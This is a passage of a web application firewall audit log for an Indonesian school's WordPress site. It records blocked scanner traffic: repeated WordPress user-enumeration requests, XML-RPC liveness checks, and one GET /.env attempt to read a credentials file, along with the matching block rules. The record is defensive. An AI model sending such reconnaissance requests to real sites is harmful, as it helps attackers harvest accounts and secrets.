User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00429d6d-C-- demo.sayHello --00429d6d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00429d6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305134619329 5389 (- - -) Stopwatch2: 1746305134619329 5389; combined=4127, p1=457, p2=3419, p3=32, p4=33, p5=121, sr=69, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00429d6d-Z-- --c7b6c96c-A-- [04/May/2025:03:45:57 +0700] aBaAhUSOhfQ6W15Bgg8SLAAAAEc 103.236.140.4 51474 103.236.140.4 8181 --c7b6c96c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c7b6c96c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7b6c96c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305157219851 3056 (- - -) Stopwatch2: 1746305157219851 3056; combined=1393, p1=481, p2=880, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7b6c96c-Z-- --73d64e1d-A-- [04/May/2025:03:46:04 +0700] aBaAjCleQJs6d7wanHHVMgAAAMY 103.236.140.4 51482 103.236.140.4 8181 --73d64e1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --73d64e1d-C-- demo.sayHello --73d64e1d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --73d64e1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305164102901 6137 (- - -) Stopwatch2: 1746305164102901 6137; combined=4517, p1=603, p2=3687, p3=33, p4=37, p5=93, sr=104, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73d64e1d-Z-- --22ee6731-A-- [04/May/2025:03:46:14 +0700] aBaAloOgvPi2IO4kz1sCcwAAAIc 103.236.140.4 51510 103.236.140.4 8181 --22ee6731-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --22ee6731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ee6731-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305174860102 3211 (- - -) Stopwatch2: 1746305174860102 3211; combined=1474, p1=470, p2=972, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ee6731-Z-- --0da8a960-A-- [04/May/2025:03:46:20 +0700] aBaAnMP0ZqGY3Jj2X92cvgAAAAc 103.236.140.4 51516 103.236.140.4 8181 --0da8a960-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0da8a960-C-- demo.sayHello --0da8a960-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0da8a960-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305180156580 4367 (- - -) Stopwatch2: 1746305180156580 4367; combined=3023, p1=440, p2=2423, p3=26, p4=28, p5=63, sr=61, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0da8a960-Z-- --aa5ba774-A-- [04/May/2025:03:46:28 +0700] aBaApLRQKtQAGKxHb0rAwQAAAII 103.236.140.4 51532 103.236.140.4 8181 --aa5ba774-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa5ba774-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa5ba774-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305188692275 3563 (- - -) Stopwatch2: 1746305188692275 3563; combined=1367, p1=500, p2=837, p3=0, p4=0, p5=30, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa5ba774-Z-- --e65b4200-A-- [04/May/2025:03:46:34 +0700] aBaAqrRQKtQAGKxHb0rAwwAAAIQ 103.236.140.4 51544 103.236.140.4 8181 --e65b4200-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e65b4200-C-- demo.sayHello --e65b4200-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e65b4200-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305194644723 6294 (- - -) Stopwatch2: 1746305194644723 6294; combined=4263, p1=602, p2=3429, p3=34, p4=39, p5=93, sr=76, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e65b4200-Z-- --f6d04a2e-A-- [04/May/2025:03:47:46 +0700] aBaA8mJEE9ao5dcyYWnrwwAAAIA 103.236.140.4 51560 103.236.140.4 8181 --f6d04a2e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6d04a2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6d04a2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305266256520 4241 (- - -) Stopwatch2: 1746305266256520 4241; combined=1912, p1=767, p2=1115, p3=0, p4=0, p5=30, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6d04a2e-Z-- --f1c11176-A-- [04/May/2025:03:47:50 +0700] aBaA9mJEE9ao5dcyYWnrxAAAAIM 103.236.140.4 51564 103.236.140.4 8181 --f1c11176-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1c11176-C-- demo.sayHello --f1c11176-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1c11176-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305270991341 7056 (- - -) Stopwatch2: 1746305270991341 7056; combined=4941, p1=657, p2=4005, p3=37, p4=43, p5=114, sr=94, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1c11176-Z-- --7a15cd20-A-- [04/May/2025:04:32:26 +0700] aBaLavnZiHJYHUAF8QfZawAAAAM 103.236.140.4 53448 103.236.140.4 8181 --7a15cd20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.141.52 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.141.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7a15cd20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a15cd20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746307946532750 907 (- - -) Stopwatch2: 1746307946532750 907; combined=375, p1=336, p2=0, p3=0, p4=0, p5=39, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a15cd20-Z-- --e1891a35-A-- [04/May/2025:04:35:25 +0700] aBaMHdsVQyl9V2B8Pt-qcgAAAEk 103.236.140.4 53462 103.236.140.4 8181 --e1891a35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e1891a35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1891a35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308125618137 3663 (- - -) Stopwatch2: 1746308125618137 3663; combined=1526, p1=521, p2=973, p3=0, p4=0, p5=32, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1891a35-Z-- --d0e33264-A-- [04/May/2025:04:35:34 +0700] aBaMJvnZiHJYHUAF8QfZcAAAAAo 103.236.140.4 53466 103.236.140.4 8181 --d0e33264-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d0e33264-C-- demo.sayHello --d0e33264-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0e33264-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308134602491 6125 (- - -) Stopwatch2: 1746308134602491 6125; combined=4281, p1=603, p2=3495, p3=23, p4=25, p5=78, sr=116, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0e33264-Z-- --167e6f6d-A-- [04/May/2025:04:42:05 +0700] aBaNrfnZiHJYHUAF8QfZdQAAABM 103.236.140.4 55156 103.236.140.4 8181 --167e6f6d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --167e6f6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --167e6f6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308525569674 2845 (- - -) Stopwatch2: 1746308525569674 2845; combined=1256, p1=437, p2=778, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --167e6f6d-Z-- --f388f718-A-- [04/May/2025:04:42:15 +0700] aBaNt_nZiHJYHUAF8QfZegAAAAE 103.236.140.4 55188 103.236.140.4 8181 --f388f718-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f388f718-C-- demo.sayHello --f388f718-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f388f718-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308535951083 5940 (- - -) Stopwatch2: 1746308535951083 5940; combined=4311, p1=631, p2=3530, p3=21, p4=23, p5=62, sr=143, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f388f718-Z-- --37c2f61e-A-- [04/May/2025:04:42:41 +0700] aBaN0echPF6irSergtv7FwAAAMo 103.236.140.4 55194 103.236.140.4 8181 --37c2f61e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37c2f61e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37c2f61e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308561778257 3324 (- - -) Stopwatch2: 1746308561778257 3324; combined=1384, p1=497, p2=857, p3=0, p4=0, p5=30, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37c2f61e-Z-- --68f28907-A-- [04/May/2025:04:42:48 +0700] aBaN2PnZiHJYHUAF8QfZfAAAAAU 103.236.140.4 55198 103.236.140.4 8181 --68f28907-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.210 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68f28907-C-- demo.sayHello --68f28907-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68f28907-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308568544568 4669 (- - -) Stopwatch2: 1746308568544568 4669; combined=3687, p1=437, p2=3041, p3=26, p4=25, p5=92, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68f28907-Z-- --a594fd34-A-- [04/May/2025:04:47:32 +0700] aBaO9GJEE9ao5dcyYWnsoAAAAIw 103.236.140.4 55232 103.236.140.4 8181 --a594fd34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a594fd34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a594fd34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308852821918 3241 (- - -) Stopwatch2: 1746308852821918 3241; combined=1397, p1=518, p2=849, p3=0, p4=0, p5=30, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a594fd34-Z-- --57109009-A-- [04/May/2025:04:47:38 +0700] aBaO-mJEE9ao5dcyYWnsogAAAI4 103.236.140.4 55236 103.236.140.4 8181 --57109009-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: 